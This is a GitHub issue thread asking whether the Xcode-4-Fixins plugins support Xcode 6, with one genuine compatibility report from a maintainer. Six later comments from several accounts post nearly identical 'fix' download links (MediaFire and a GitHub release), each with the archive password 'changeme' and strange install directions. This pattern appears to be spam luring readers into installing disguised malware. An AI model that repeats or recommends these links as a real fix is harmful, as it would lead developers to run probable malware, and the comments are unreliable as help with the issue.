### ISSUE TITLE
Xcode 6 support?

### ISSUE THREAD

**Issue by komocode** [davekeck/Xcode-4-Fixins#34]

**Comment by tom-seddon** [comment]
I just had a quick go on Version 6.4 (6E35b), and found the following:
- FindFix - doesn't work (find dialog is jumbled and non-functional, because Apple rewrote the find dialog, again)
- UserScripts - doesn't work (doesn't create the Scripts menu - reasons unknown)
- TabAcceptsCompletions, InhibitTabNextPlaceholder - mostly work (looks like Xcode 6 has changed some stuff, though, so the UX isn't always great)
- DisableAnimations, HideDistractions, CurrentLineHighlighter - seem to work OK

I might have a go at fixing the problem ones if I get some spare time. At the very least, I should upgrade the README to say there's some compatibility with Xcode 6.

I can't speak for any of the other maintainers, but it's been a long time since I used Xcode regularly (I don't do Apple-related work any more...), which is partly why the fixins have languished a bit...

--Tom

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
